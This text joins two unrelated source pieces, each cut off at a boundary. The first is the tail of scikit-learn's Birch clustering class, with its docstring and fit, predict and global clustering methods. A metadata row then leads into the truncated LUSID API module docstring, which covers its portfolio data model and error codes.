        in each. The parent subcluster of that node is removed and two new
        subclusters are added as parents of the 2 split nodes.

    n_clusters : int, instance of sklearn.cluster model, default=3
        Number of clusters after the final clustering step, which treats the
        subclusters from the leaves as new samples.

        - `None` : the final clustering step is not performed and the
          subclusters are returned as they are.

        - :mod:`sklearn.cluster` Estimator : If a model is provided, the model
          is fit treating the subclusters as new samples and the initial data
          is mapped to the label of the closest subcluster.

        - `int` : the model fit is :class:`AgglomerativeClustering` with
          `n_clusters` set to be equal to the int.

    compute_labels : bool, default=True
        Whether or not to compute labels for each fit.

    copy : bool, default=True
        Whether or not to make a copy of the given data. If set to False,
        the initial data will be overwritten.

    Attributes
    ----------
    root_ : _CFNode
        Root of the CFTree.

    dummy_leaf_ : _CFNode
        Start pointer to all the leaves.

    subcluster_centers_ : ndarray
        Centroids of all subclusters read directly from the leaves.

    subcluster_labels_ : ndarray
        Labels assigned to the centroids of the subclusters after
        they are clustered globally.

    labels_ : ndarray of shape (n_samples,)
        Array of labels assigned to the input data.
        if partial_fit is used instead of fit, they are assigned to the
        last batch of data.

    See Also
    --------
    MiniBatchKMeans : Alternative implementation that does incremental updates
        of the centers' positions using mini-batches.

    Notes
    -----
    The tree data structure consists of nodes with each node consisting of
    a number of subclusters. The maximum number of subclusters in a node
    is determined by the branching factor. Each subcluster maintains a
    linear sum, squared sum and the number of samples in that subcluster.
    In addition, each subcluster can also have a node as its child, if the
    subcluster is not a member of a leaf node.

    For a new point entering the root, it is merged with the subcluster closest
    to it and the linear sum, squared sum and the number of samples of that
    subcluster are updated. This is done recursively till the properties of
    the leaf node are updated.

    References
    ----------
    * Tian Zhang, Raghu Ramakrishnan, Miron Livny
      BIRCH: An efficient data clustering method for large databases.
      https://www.cs.sfu.ca/CourseCentral/459/han/papers/zhang96.pdf

    * Roberto Perdisci
      JBirch - Java implementation of BIRCH clustering algorithm
      https://code.google.com/archive/p/jbirch

    Examples
    --------
    >>> from sklearn.cluster import Birch
    >>> X = [[0, 1], [0.3, 1], [-0.3, 1], [0, -1], [0.3, -1], [-0.3, -1]]
    >>> brc = Birch(n_clusters=None)
    >>> brc.fit(X)
    Birch(n_clusters=None)
    >>> brc.predict(X)
    array([0, 0, 0, 1, 1, 1])
    """
    @_deprecate_positional_args
    def __init__(self, *, threshold=0.5, branching_factor=50, n_clusters=3,
                 compute_labels=True, copy=True):
        self.threshold = threshold
        self.branching_factor = branching_factor
        self.n_clusters = n_clusters
        self.compute_labels = compute_labels
        self.copy = copy

    # TODO: Remove in 1.2
    # mypy error: Decorated property not supported
    @deprecated(  # type: ignore
        "fit_ is deprecated in 1.0 and will be removed in 1.2"
    )
    @property
    def fit_(self):
        return self._deprecated_fit

    # TODO: Remove in 1.2
    # mypy error: Decorated property not supported
    @deprecated(  # type: ignore
        "partial_fit_ is deprecated in 1.0 and will be removed in 1.2"
    )
    @property
    def partial_fit_(self):
        return self._deprecated_partial_fit

    def fit(self, X, y=None):
        """
        Build a CF Tree for the input data.

        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            Input data.

        y : Ignored
            Not used, present here for API consistency by convention.

        Returns
        -------
        self
            Fitted estimator.
        """
        # TODO: Remove deprecated flags in 1.2
        self._deprecated_fit, self._deprecated_partial_fit = True, False
        return self._fit(X, partial=False)

    def _fit(self, X, partial):
        # Shared implementation for fit and partial_fit. `partial` controls
        # whether an existing tree (root_) is extended or a new one is built.
        has_root = getattr(self, 'root_', None)
        first_call = not (partial and has_root)

        X = self._validate_data(X, accept_sparse='csr', copy=self.copy,
                                reset=first_call)
        threshold = self.threshold
        branching_factor = self.branching_factor

        if branching_factor <= 1:
            raise ValueError("Branching_factor should be greater than one.")
        n_samples, n_features = X.shape

        # If partial_fit is called for the first time or fit is called, we
        # start a new tree.
        if first_call:
            # The first root is the leaf. Manipulate this object throughout.
            self.root_ = _CFNode(threshold=threshold,
                                 branching_factor=branching_factor,
                                 is_leaf=True,
                                 n_features=n_features)

            # To enable getting back subclusters.
            self.dummy_leaf_ = _CFNode(threshold=threshold,
                                       branching_factor=branching_factor,
                                       is_leaf=True, n_features=n_features)
            self.dummy_leaf_.next_leaf_ = self.root_
            self.root_.prev_leaf_ = self.dummy_leaf_

        # Cannot vectorize. Enough to convince to use cython.
        if not sparse.issparse(X):
            iter_func = iter
        else:
            iter_func = _iterate_sparse_X

        for sample in iter_func(X):
            # Each sample starts as a singleton subcluster and is pushed
            # down the tree; a True return means the root overflowed.
            subcluster = _CFSubcluster(linear_sum=sample)
            split = self.root_.insert_cf_subcluster(subcluster)

            if split:
                # Grow the tree one level: the old root is split and a new
                # (non-leaf) root takes the two halves as its subclusters.
                new_subcluster1, new_subcluster2 = _split_node(
                    self.root_, threshold, branching_factor)
                del self.root_
                self.root_ = _CFNode(threshold=threshold,
                                     branching_factor=branching_factor,
                                     is_leaf=False,
                                     n_features=n_features)
                self.root_.append_subcluster(new_subcluster1)
                self.root_.append_subcluster(new_subcluster2)

        centroids = np.concatenate([
            leaf.centroids_ for leaf in self._get_leaves()])
        self.subcluster_centers_ = centroids

        self._global_clustering(X)
        return self

    def _get_leaves(self):
        """
        Retrieve the leaves of the CF Node.

        Returns
        -------
        leaves : list of shape (n_leaves,)
            List of the leaf nodes.
        """
        # Walk the singly-linked chain starting after the dummy sentinel.
        leaf_ptr = self.dummy_leaf_.next_leaf_
        leaves = []
        while leaf_ptr is not None:
            leaves.append(leaf_ptr)
            leaf_ptr = leaf_ptr.next_leaf_
        return leaves

    def partial_fit(self, X=None, y=None):
        """
        Online learning. Prevents rebuilding of CFTree from scratch.

        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features), \
                default=None
            Input data. If X is not provided, only the global clustering
            step is done.

        y : Ignored
            Not used, present here for API consistency by convention.

        Returns
        -------
        self
            Fitted estimator.
        """
        # TODO: Remove deprecated flags in 1.2
        self._deprecated_partial_fit, self._deprecated_fit = True, False
        if X is None:
            # Perform just the final global clustering step.
            self._global_clustering()
            return self
        else:
            return self._fit(X, partial=True)

    def _check_fit(self, X):
        # Guard for prediction-time inputs: the estimator must be fitted and
        # X must have as many features as the stored subcluster centers.
        check_is_fitted(self)

        if (hasattr(self, 'subcluster_centers_') and
                X.shape[1] != self.subcluster_centers_.shape[1]):
            raise ValueError(
                "Training data and predicted data do "
                "not have same number of features.")

    def predict(self, X):
        """
        Predict data using the ``centroids_`` of subclusters.

        Avoid computation of the row norms of X.

        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            Input data.

        Returns
        -------
        labels : ndarray of shape(n_samples,)
            Labelled data.
        """
        check_is_fitted(self)
        X = self._validate_data(X, accept_sparse='csr', reset=False)
        # Reuse the subcluster norms precomputed in _global_clustering so
        # pairwise_distances_argmin does not recompute them per call.
        kwargs = {'Y_norm_squared': self._subcluster_norms}

        with config_context(assume_finite=True):
            argmin = pairwise_distances_argmin(X, self.subcluster_centers_,
                                               metric_kwargs=kwargs)
        return self.subcluster_labels_[argmin]

    def transform(self, X):
        """
        Transform X into subcluster centroids dimension.

        Each dimension represents the distance from the sample point to each
        cluster centroid.

        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            Input data.

        Returns
        -------
        X_trans : {array-like, sparse matrix} of shape (n_samples, n_clusters)
            Transformed data.
        """
        check_is_fitted(self)
        self._validate_data(X, accept_sparse='csr', reset=False)
        with config_context(assume_finite=True):
            return euclidean_distances(X, self.subcluster_centers_)

    def _global_clustering(self, X=None):
        """
        Global clustering for the subclusters obtained after fitting
        """
        clusterer = self.n_clusters
        centroids = self.subcluster_centers_
        compute_labels = (X is not None) and self.compute_labels

        # Preprocessing for the global clustering.
        not_enough_centroids = False
        if isinstance(clusterer, numbers.Integral):
            clusterer = AgglomerativeClustering(
                n_clusters=self.n_clusters)
            # There is no need to perform the global clustering step.
            if len(centroids) < self.n_clusters:
                not_enough_centroids = True
        elif (clusterer is not None and not
              hasattr(clusterer, 'fit_predict')):
            raise ValueError("n_clusters should be an instance of "
                             "ClusterMixin or an int")

        # To use in predict to avoid recalculation.
        self._subcluster_norms = row_norms(
            self.subcluster_centers_, squared=True)

        if clusterer is None or not_enough_centroids:
            # No global step: each subcluster is its own label.
            self.subcluster_labels_ = np.arange(len(centroids))
            if not_enough_centroids:
                warnings.warn(
                    "Number of subclusters found (%d) by Birch is less "
                    "than (%d). Decrease the threshold."
                    % (len(centroids), self.n_clusters), ConvergenceWarning)
        else:
            # The global clustering step that clusters the subclusters of
            # the leaves. It assumes the centroids of the subclusters as
            # samples and finds the final centroids.
            self.subcluster_labels_ = clusterer.fit_predict(
                self.subcluster_centers_)

        if compute_labels:
            self.labels_ = self.predict(X)
| 37.089985 | 79 | 0.632401 |
795c7db5b9a1153261e66af17f6ae5f314a512e7 | 33,456 | py | Python | sdk/lusid/models/update_property_definition_request.py | fossabot/lusid-sdk-python-preview | 2c95d870489d93dee921593877256d3869c090e6 | [
"MIT"
] | null | null | null | sdk/lusid/models/update_property_definition_request.py | fossabot/lusid-sdk-python-preview | 2c95d870489d93dee921593877256d3869c090e6 | [
"MIT"
] | null | null | null | sdk/lusid/models/update_property_definition_request.py | fossabot/lusid-sdk-python-preview | 2c95d870489d93dee921593877256d3869c090e6 | [
"MIT"
] | 1 | 2020-10-29T08:35:32.000Z | 2020-10-29T08:35:32.000Z | # coding: utf-8
"""
LUSID API
# Introduction This page documents the [LUSID APIs](https://www.lusid.com/api/swagger), which allows authorised clients to query and update their data within the LUSID platform. SDKs to interact with the LUSID APIs are available in the following languages : * [C#](https://github.com/finbourne/lusid-sdk-csharp) * [Java](https://github.com/finbourne/lusid-sdk-java) * [JavaScript](https://github.com/finbourne/lusid-sdk-js) * [Python](https://github.com/finbourne/lusid-sdk-python) # Data Model The LUSID API has a relatively lightweight but extremely powerful data model. One of the goals of LUSID was not to enforce on clients a single rigid data model but rather to provide a flexible foundation onto which clients can map their own data models. The core entities in LUSID provide a minimal structure and set of relationships, and the data model can be extended using Properties. The LUSID data model is exposed through the LUSID APIs. The APIs provide access to both business objects and the meta data used to configure the systems behaviours. The key business entities are: - * **Portfolios** A portfolio is a container for transactions and holdings (a **Transaction Portfolio**) or constituents (a **Reference Portfolio**). * **Derived Portfolios**. Derived Portfolios allow Portfolios to be created based on other Portfolios, by overriding or adding specific items. * **Holdings** A Holding is a quantity of an Instrument or a balance of cash within a Portfolio. Holdings can only be adjusted via Transactions. * **Transactions** A Transaction is an economic event that occurs in a Portfolio, causing its holdings to change. * **Corporate Actions** A corporate action is a market event which occurs to an Instrument and thus applies to all portfolios which holding the instrument. Examples are stock splits or mergers. * **Constituents** A constituent is a record in a Reference Portfolio containing an Instrument and an associated weight. 
* **Instruments** An instrument represents a currency, tradable instrument or OTC contract that is attached to a transaction and a holding. * **Properties** All major entities allow additional user defined properties to be associated with them. For example, a Portfolio manager may be associated with a portfolio. Meta data includes: - * **Transaction Types** Transactions are booked with a specific transaction type. The types are client defined and are used to map the Transaction to a series of movements which update the portfolio holdings. * **Properties Types** Types of user defined properties used within the system. ## Scope All data in LUSID is segregated at the client level. Entities in LUSID are identifiable by a unique code. Every entity lives within a logical data partition known as a Scope. Scope is an identity namespace allowing two entities with the same unique code to co-exist within individual address spaces. For example, prices for equities from different vendors may be uploaded into different scopes such as `client/vendor1` and `client/vendor2`. A portfolio may then be valued using either of the price sources by referencing the appropriate scope. LUSID Clients cannot access scopes of other clients. ## Instruments LUSID has its own built-in instrument master which you can use to master your own instrument universe. Every instrument must be created with one or more unique market identifiers, such as [FIGI](https://openfigi.com/). For any non-listed instruments (eg OTCs), you can upload an instrument against a custom ID of your choosing. In addition, LUSID will allocate each instrument a unique 'LUSID instrument identifier'. The LUSID instrument identifier is what is used when uploading transactions, holdings, prices, etc. The API exposes an `instrument/lookup` endpoint which can be used to lookup these LUSID identifiers using their market identifiers. Cash can be referenced using the ISO currency code prefixed with \"`CCY_`\" e.g. 
`CCY_GBP` ## Instrument Data Instrument data can be uploaded to the system using the [Instrument Properties](#tag/InstrumentProperties) endpoint. | Field|Type|Description | | ---|---|--- | | Key|propertykey|The key of the property. This takes the format {domain}/{scope}/{code} e.g. 'Instrument/system/Name' or 'Transaction/strategy/quantsignal'. | | Value|string|The value of the property. | | EffectiveFrom|datetimeoffset|The effective datetime from which the property is valid. | ## Transaction Portfolios Portfolios are the top-level entity containers within LUSID, containing transactions, corporate actions and holdings. The transactions build up the portfolio holdings on which valuations, analytics profit & loss and risk can be calculated. Properties can be associated with Portfolios to add in additional data. Portfolio properties can be changed over time, for example to allow a Portfolio Manager to be linked with a Portfolio. Additionally, portfolios can be securitised and held by other portfolios, allowing LUSID to perform \"drill-through\" into underlying fund holdings ### Derived Portfolios LUSID also allows for a portfolio to be composed of another portfolio via derived portfolios. A derived portfolio can contain its own transactions and also inherits any transactions from its parent portfolio. Any changes made to the parent portfolio are automatically reflected in derived portfolio. Derived portfolios in conjunction with scopes are a powerful construct. For example, to do pre-trade what-if analysis, a derived portfolio could be created a new namespace linked to the underlying live (parent) portfolio. Analysis can then be undertaken on the derived portfolio without affecting the live portfolio. ### Transactions A transaction represents an economic activity against a Portfolio. Transactions are processed according to a configuration. This will tell the LUSID engine how to interpret the transaction and correctly update the holdings. 
LUSID comes with a set of transaction types you can use out of the box, or you can configure your own set(s) of transactions. For more details see the [LUSID Getting Started Guide for transaction configuration.](https://support.lusid.com/configuring-transaction-types) | Field|Type|Description | | ---|---|--- | | TransactionId|string|The unique identifier for the transaction. | | Type|string|The type of the transaction e.g. 'Buy', 'Sell'. The transaction type should have been pre-configured via the System Configuration API endpoint. If it hasn't been pre-configured the transaction will still be updated or inserted however you will be unable to generate the resultant holdings for the portfolio that contains this transaction as LUSID does not know how to process it. | | InstrumentIdentifiers|map|A set of instrument identifiers to use to resolve the transaction to a unique instrument. | | TransactionDate|dateorcutlabel|The date of the transaction. | | SettlementDate|dateorcutlabel|The settlement date of the transaction. | | Units|decimal|The number of units transacted in the associated instrument. | | TransactionPrice|transactionprice|The price for each unit of the transacted instrument in the transaction currency. | | TotalConsideration|currencyandamount|The total value of the transaction in the settlement currency. | | ExchangeRate|decimal|The exchange rate between the transaction and settlement currency. For example if the transaction currency is in USD and the settlement currency is in GBP this this the USD/GBP rate. | | TransactionCurrency|currency|The transaction currency. | | Properties|map|Set of unique transaction properties and associated values to store with the transaction. Each property must be from the 'Transaction' domain. | | CounterpartyId|string|The identifier for the counterparty of the transaction. | | Source|string|The source of the transaction. This is used to look up the appropriate transaction group set in the transaction type configuration. 
| From these fields, the following values can be calculated * **Transaction value in Transaction currency**: TotalConsideration / ExchangeRate * **Transaction value in Portfolio currency**: Transaction value in Transaction currency * TradeToPortfolioRate #### Example Transactions ##### A Common Purchase Example Three example transactions are shown in the table below. They represent a purchase of USD denominated IBM shares within a Sterling denominated portfolio. * The first two transactions are for separate buy and fx trades * Buying 500 IBM shares for $71,480.00 * A spot foreign exchange conversion to fund the IBM purchase. (Buy $71,480.00 for £54,846.60) * The third transaction is an alternate version of the above trades. Buying 500 IBM shares and settling directly in Sterling. | Column | Buy Trade | Fx Trade | Buy Trade with foreign Settlement | | ----- | ----- | ----- | ----- | | TransactionId | FBN00001 | FBN00002 | FBN00003 | | Type | Buy | FxBuy | Buy | | InstrumentIdentifiers | { \"figi\", \"BBG000BLNNH6\" } | { \"CCY\", \"CCY_USD\" } | { \"figi\", \"BBG000BLNNH6\" } | | TransactionDate | 2018-08-02 | 2018-08-02 | 2018-08-02 | | SettlementDate | 2018-08-06 | 2018-08-06 | 2018-08-06 | | Units | 500 | 71480 | 500 | | TransactionPrice | 142.96 | 1 | 142.96 | | TradeCurrency | USD | USD | USD | | ExchangeRate | 1 | 0.7673 | 0.7673 | | TotalConsideration.Amount | 71480.00 | 54846.60 | 54846.60 | | TotalConsideration.Currency | USD | GBP | GBP | | Trade/default/TradeToPortfolioRate* | 0.7673 | 0.7673 | 0.7673 | [* This is a property field] ##### A Forward FX Example LUSID has a flexible transaction modelling system, meaning there are a number of different ways of modelling forward fx trades. The default LUSID transaction types are FwdFxBuy and FwdFxSell. Using these transaction types, LUSID will generate two holdings for each Forward FX trade, one for each currency in the trade. 
An example Forward Fx trade to sell GBP for USD in a JPY-denominated portfolio is shown below: | Column | Forward 'Sell' Trade | Notes | | ----- | ----- | ---- | | TransactionId | FBN00004 | | | Type | FwdFxSell | | | InstrumentIdentifiers | { \"Instrument/default/Currency\", \"GBP\" } | | | TransactionDate | 2018-08-02 | | | SettlementDate | 2019-02-06 | Six month forward | | Units | 10000.00 | Units of GBP | | TransactionPrice | 1 | | | TradeCurrency | GBP | Currency being sold | | ExchangeRate | 1.3142 | Agreed rate between GBP and USD | | TotalConsideration.Amount | 13142.00 | Amount in the settlement currency, USD | | TotalConsideration.Currency | USD | Settlement currency | | Trade/default/TradeToPortfolioRate | 142.88 | Rate between trade currency, GBP and portfolio base currency, JPY | Please note that exactly the same economic behaviour could be modelled using the FwdFxBuy Transaction Type with the amounts and rates reversed. ### Holdings A holding represents a position in an instrument or cash on a given date. | Field|Type|Description | | ---|---|--- | | InstrumentUid|string|The unqiue Lusid Instrument Id (LUID) of the instrument that the holding is in. | | SubHoldingKeys|map|The sub-holding properties which identify the holding. Each property will be from the 'Transaction' domain. These are configured when a transaction portfolio is created. | | Properties|map|The properties which have been requested to be decorated onto the holding. These will be from the 'Instrument' or 'Holding' domain. | | HoldingType|string|The type of the holding e.g. Position, Balance, CashCommitment, Receivable, ForwardFX etc. | | Units|decimal|The total number of units of the holding. | | SettledUnits|decimal|The total number of settled units of the holding. | | Cost|currencyandamount|The total cost of the holding in the transaction currency. | | CostPortfolioCcy|currencyandamount|The total cost of the holding in the portfolio currency. 
| | Transaction|transaction|The transaction associated with an unsettled holding. | ## Corporate Actions Corporate actions are represented within LUSID in terms of a set of instrument-specific 'transitions'. These transitions are used to specify the participants of the corporate action, and the effect that the corporate action will have on holdings in those participants. ### Corporate Action | Field|Type|Description | | ---|---|--- | | CorporateActionCode|code|The unique identifier of this corporate action | | Description|string| | | AnnouncementDate|datetimeoffset|The announcement date of the corporate action | | ExDate|datetimeoffset|The ex date of the corporate action | | RecordDate|datetimeoffset|The record date of the corporate action | | PaymentDate|datetimeoffset|The payment date of the corporate action | | Transitions|corporateactiontransition[]|The transitions that result from this corporate action | ### Transition | Field|Type|Description | | ---|---|--- | | InputTransition|corporateactiontransitioncomponent|Indicating the basis of the corporate action - which security and how many units | | OutputTransitions|corporateactiontransitioncomponent[]|What will be generated relative to the input transition | ### Example Corporate Action Transitions #### A Dividend Action Transition In this example, for each share of IBM, 0.20 units (or 20 pence) of GBP are generated. | Column | Input Transition | Output Transition | | ----- | ----- | ----- | | Instrument Identifiers | { \"figi\" : \"BBG000BLNNH6\" } | { \"ccy\" : \"CCY_GBP\" } | | Units Factor | 1 | 0.20 | | Cost Factor | 1 | 0 | #### A Split Action Transition In this example, for each share of IBM, we end up with 2 units (2 shares) of IBM, with total value unchanged. 
| Column | Input Transition | Output Transition | | ----- | ----- | ----- | | Instrument Identifiers | { \"figi\" : \"BBG000BLNNH6\" } | { \"figi\" : \"BBG000BLNNH6\" } | | Units Factor | 1 | 2 | | Cost Factor | 1 | 1 | #### A Spinoff Action Transition In this example, for each share of IBM, we end up with 1 unit (1 share) of IBM and 3 units (3 shares) of Celestica, with 85% of the value remaining on the IBM share, and 5% in each Celestica share (15% total). | Column | Input Transition | Output Transition 1 | Output Transition 2 | | ----- | ----- | ----- | ----- | | Instrument Identifiers | { \"figi\" : \"BBG000BLNNH6\" } | { \"figi\" : \"BBG000BLNNH6\" } | { \"figi\" : \"BBG000HBGRF3\" } | | Units Factor | 1 | 1 | 3 | | Cost Factor | 1 | 0.85 | 0.15 | ## Reference Portfolios Reference portfolios are portfolios that contain constituents with weights. They are designed to represent entities such as indices and benchmarks. ### Constituents | Field|Type|Description | | ---|---|--- | | InstrumentIdentifiers|map|Unique instrument identifiers | | InstrumentUid|string|LUSID's internal unique instrument identifier, resolved from the instrument identifiers | | Currency|decimal| | | Weight|decimal| | | FloatingWeight|decimal| | ## Portfolio Groups Portfolio groups allow the construction of a hierarchy from portfolios and groups. Portfolio operations on the group are executed on an aggregated set of portfolios in the hierarchy. For example: * Global Portfolios _(group)_ * APAC _(group)_ * Hong Kong _(portfolio)_ * Japan _(portfolio)_ * Europe _(group)_ * France _(portfolio)_ * Germany _(portfolio)_ * UK _(portfolio)_ In this example **Global Portfolios** is a group that consists of an aggregate of **Hong Kong**, **Japan**, **France**, **Germany** and **UK** portfolios. ## Properties Properties are key-value pairs that can be applied to any entity within a domain (where a domain is `trade`, `portfolio`, `security` etc). 
Properties must be defined before use with a `PropertyDefinition` and can then subsequently be added to entities. ## Schema A detailed description of the entities used by the API and parameters for endpoints which take a JSON document can be retrieved via the `schema` endpoint. ## Meta data The following headers are returned on all responses from LUSID | Name | Purpose | | --- | --- | | lusid-meta-duration | Duration of the request | | lusid-meta-success | Whether or not LUSID considered the request to be successful | | lusid-meta-requestId | The unique identifier for the request | | lusid-schema-url | Url of the schema for the data being returned | | lusid-property-schema-url | Url of the schema for any properties | # Error Codes | Code|Name|Description | | ---|---|--- | | <a name=\"-10\">-10</a>|Server Configuration Error| | | <a name=\"-1\">-1</a>|Unknown error|An unexpected error was encountered on our side. | | <a name=\"102\">102</a>|Version Not Found| | | <a name=\"103\">103</a>|Api Rate Limit Violation| | | <a name=\"104\">104</a>|Instrument Not Found| | | <a name=\"105\">105</a>|Property Not Found| | | <a name=\"106\">106</a>|Portfolio Recursion Depth| | | <a name=\"108\">108</a>|Group Not Found| | | <a name=\"109\">109</a>|Portfolio Not Found| | | <a name=\"110\">110</a>|Property Schema Not Found| | | <a name=\"111\">111</a>|Portfolio Ancestry Not Found| | | <a name=\"112\">112</a>|Portfolio With Id Already Exists| | | <a name=\"113\">113</a>|Orphaned Portfolio| | | <a name=\"119\">119</a>|Missing Base Claims| | | <a name=\"121\">121</a>|Property Not Defined| | | <a name=\"122\">122</a>|Cannot Delete System Property| | | <a name=\"123\">123</a>|Cannot Modify Immutable Property Field| | | <a name=\"124\">124</a>|Property Already Exists| | | <a name=\"125\">125</a>|Invalid Property Life Time| | | <a name=\"126\">126</a>|Property Constraint Style Excludes Properties| | | <a name=\"127\">127</a>|Cannot Modify Default Data Type| | | <a 
name=\"128\">128</a>|Group Already Exists| | | <a name=\"129\">129</a>|No Such Data Type| | | <a name=\"130\">130</a>|Undefined Value For Data Type| | | <a name=\"131\">131</a>|Unsupported Value Type Defined On Data Type| | | <a name=\"132\">132</a>|Validation Error| | | <a name=\"133\">133</a>|Loop Detected In Group Hierarchy| | | <a name=\"134\">134</a>|Undefined Acceptable Values| | | <a name=\"135\">135</a>|Sub Group Already Exists| | | <a name=\"138\">138</a>|Price Source Not Found| | | <a name=\"139\">139</a>|Analytic Store Not Found| | | <a name=\"141\">141</a>|Analytic Store Already Exists| | | <a name=\"143\">143</a>|Client Instrument Already Exists| | | <a name=\"144\">144</a>|Duplicate In Parameter Set| | | <a name=\"147\">147</a>|Results Not Found| | | <a name=\"148\">148</a>|Order Field Not In Result Set| | | <a name=\"149\">149</a>|Operation Failed| | | <a name=\"150\">150</a>|Elastic Search Error| | | <a name=\"151\">151</a>|Invalid Parameter Value| | | <a name=\"153\">153</a>|Command Processing Failure| | | <a name=\"154\">154</a>|Entity State Construction Failure| | | <a name=\"155\">155</a>|Entity Timeline Does Not Exist| | | <a name=\"156\">156</a>|Concurrency Conflict Failure| | | <a name=\"157\">157</a>|Invalid Request| | | <a name=\"158\">158</a>|Event Publish Unknown| | | <a name=\"159\">159</a>|Event Query Failure| | | <a name=\"160\">160</a>|Blob Did Not Exist| | | <a name=\"162\">162</a>|Sub System Request Failure| | | <a name=\"163\">163</a>|Sub System Configuration Failure| | | <a name=\"165\">165</a>|Failed To Delete| | | <a name=\"166\">166</a>|Upsert Client Instrument Failure| | | <a name=\"167\">167</a>|Illegal As At Interval| | | <a name=\"168\">168</a>|Illegal Bitemporal Query| | | <a name=\"169\">169</a>|Invalid Alternate Id| | | <a name=\"170\">170</a>|Cannot Add Source Portfolio Property Explicitly| | | <a name=\"171\">171</a>|Entity Already Exists In Group| | | <a name=\"173\">173</a>|Entity With Id Already Exists| | | <a 
name=\"174\">174</a>|Derived Portfolio Details Do Not Exist| | | <a name=\"176\">176</a>|Portfolio With Name Already Exists| | | <a name=\"177\">177</a>|Invalid Transactions| | | <a name=\"178\">178</a>|Reference Portfolio Not Found| | | <a name=\"179\">179</a>|Duplicate Id| | | <a name=\"180\">180</a>|Command Retrieval Failure| | | <a name=\"181\">181</a>|Data Filter Application Failure| | | <a name=\"182\">182</a>|Search Failed| | | <a name=\"183\">183</a>|Movements Engine Configuration Key Failure| | | <a name=\"184\">184</a>|Fx Rate Source Not Found| | | <a name=\"185\">185</a>|Accrual Source Not Found| | | <a name=\"186\">186</a>|Access Denied| | | <a name=\"187\">187</a>|Invalid Identity Token| | | <a name=\"188\">188</a>|Invalid Request Headers| | | <a name=\"189\">189</a>|Price Not Found| | | <a name=\"190\">190</a>|Invalid Sub Holding Keys Provided| | | <a name=\"191\">191</a>|Duplicate Sub Holding Keys Provided| | | <a name=\"192\">192</a>|Cut Definition Not Found| | | <a name=\"193\">193</a>|Cut Definition Invalid| | | <a name=\"194\">194</a>|Time Variant Property Deletion Date Unspecified| | | <a name=\"195\">195</a>|Perpetual Property Deletion Date Specified| | | <a name=\"196\">196</a>|Time Variant Property Upsert Date Unspecified| | | <a name=\"197\">197</a>|Perpetual Property Upsert Date Specified| | | <a name=\"200\">200</a>|Invalid Unit For Data Type| | | <a name=\"201\">201</a>|Invalid Type For Data Type| | | <a name=\"202\">202</a>|Invalid Value For Data Type| | | <a name=\"203\">203</a>|Unit Not Defined For Data Type| | | <a name=\"204\">204</a>|Units Not Supported On Data Type| | | <a name=\"205\">205</a>|Cannot Specify Units On Data Type| | | <a name=\"206\">206</a>|Unit Schema Inconsistent With Data Type| | | <a name=\"207\">207</a>|Unit Definition Not Specified| | | <a name=\"208\">208</a>|Duplicate Unit Definitions Specified| | | <a name=\"209\">209</a>|Invalid Units Definition| | | <a name=\"210\">210</a>|Invalid Instrument Identifier 
Unit| | | <a name=\"211\">211</a>|Holdings Adjustment Does Not Exist| | | <a name=\"212\">212</a>|Could Not Build Excel Url| | | <a name=\"213\">213</a>|Could Not Get Excel Version| | | <a name=\"214\">214</a>|Instrument By Code Not Found| | | <a name=\"215\">215</a>|Entity Schema Does Not Exist| | | <a name=\"216\">216</a>|Feature Not Supported On Portfolio Type| | | <a name=\"217\">217</a>|Quote Not Found| | | <a name=\"218\">218</a>|Invalid Quote Identifier| | | <a name=\"219\">219</a>|Invalid Metric For Data Type| | | <a name=\"220\">220</a>|Invalid Instrument Definition| | | <a name=\"221\">221</a>|Instrument Upsert Failure| | | <a name=\"222\">222</a>|Reference Portfolio Request Not Supported| | | <a name=\"223\">223</a>|Transaction Portfolio Request Not Supported| | | <a name=\"224\">224</a>|Invalid Property Value Assignment| | | <a name=\"230\">230</a>|Transaction Type Not Found| | | <a name=\"231\">231</a>|Transaction Type Duplication| | | <a name=\"232\">232</a>|Portfolio Does Not Exist At Given Date| | | <a name=\"233\">233</a>|Query Parser Failure| | | <a name=\"234\">234</a>|Duplicate Constituent| | | <a name=\"235\">235</a>|Unresolved Instrument Constituent| | | <a name=\"236\">236</a>|Unresolved Instrument In Transition| | | <a name=\"237\">237</a>|Missing Side Definitions| | | <a name=\"299\">299</a>|Invalid Recipe| | | <a name=\"300\">300</a>|Missing Recipe| | | <a name=\"301\">301</a>|Dependencies| | | <a name=\"304\">304</a>|Portfolio Preprocess Failure| | | <a name=\"310\">310</a>|Valuation Engine Failure| | | <a name=\"311\">311</a>|Task Factory Failure| | | <a name=\"312\">312</a>|Task Evaluation Failure| | | <a name=\"313\">313</a>|Task Generation Failure| | | <a name=\"314\">314</a>|Engine Configuration Failure| | | <a name=\"315\">315</a>|Model Specification Failure| | | <a name=\"320\">320</a>|Market Data Key Failure| | | <a name=\"321\">321</a>|Market Resolver Failure| | | <a name=\"322\">322</a>|Market Data Failure| | | <a 
name=\"330\">330</a>|Curve Failure| | | <a name=\"331\">331</a>|Volatility Surface Failure| | | <a name=\"332\">332</a>|Volatility Cube Failure| | | <a name=\"350\">350</a>|Instrument Failure| | | <a name=\"351\">351</a>|Cash Flows Failure| | | <a name=\"352\">352</a>|Reference Data Failure| | | <a name=\"360\">360</a>|Aggregation Failure| | | <a name=\"361\">361</a>|Aggregation Measure Failure| | | <a name=\"370\">370</a>|Result Retrieval Failure| | | <a name=\"371\">371</a>|Result Processing Failure| | | <a name=\"372\">372</a>|Vendor Result Processing Failure| | | <a name=\"373\">373</a>|Vendor Result Mapping Failure| | | <a name=\"374\">374</a>|Vendor Library Unauthorised| | | <a name=\"375\">375</a>|Vendor Connectivity Error| | | <a name=\"376\">376</a>|Vendor Interface Error| | | <a name=\"377\">377</a>|Vendor Pricing Failure| | | <a name=\"378\">378</a>|Vendor Translation Failure| | | <a name=\"379\">379</a>|Vendor Key Mapping Failure| | | <a name=\"380\">380</a>|Vendor Reflection Failure| | | <a name=\"390\">390</a>|Attempt To Upsert Duplicate Quotes| | | <a name=\"391\">391</a>|Corporate Action Source Does Not Exist| | | <a name=\"392\">392</a>|Corporate Action Source Already Exists| | | <a name=\"393\">393</a>|Instrument Identifier Already In Use| | | <a name=\"394\">394</a>|Properties Not Found| | | <a name=\"395\">395</a>|Batch Operation Aborted| | | <a name=\"400\">400</a>|Invalid Iso4217 Currency Code| | | <a name=\"401\">401</a>|Cannot Assign Instrument Identifier To Currency| | | <a name=\"402\">402</a>|Cannot Assign Currency 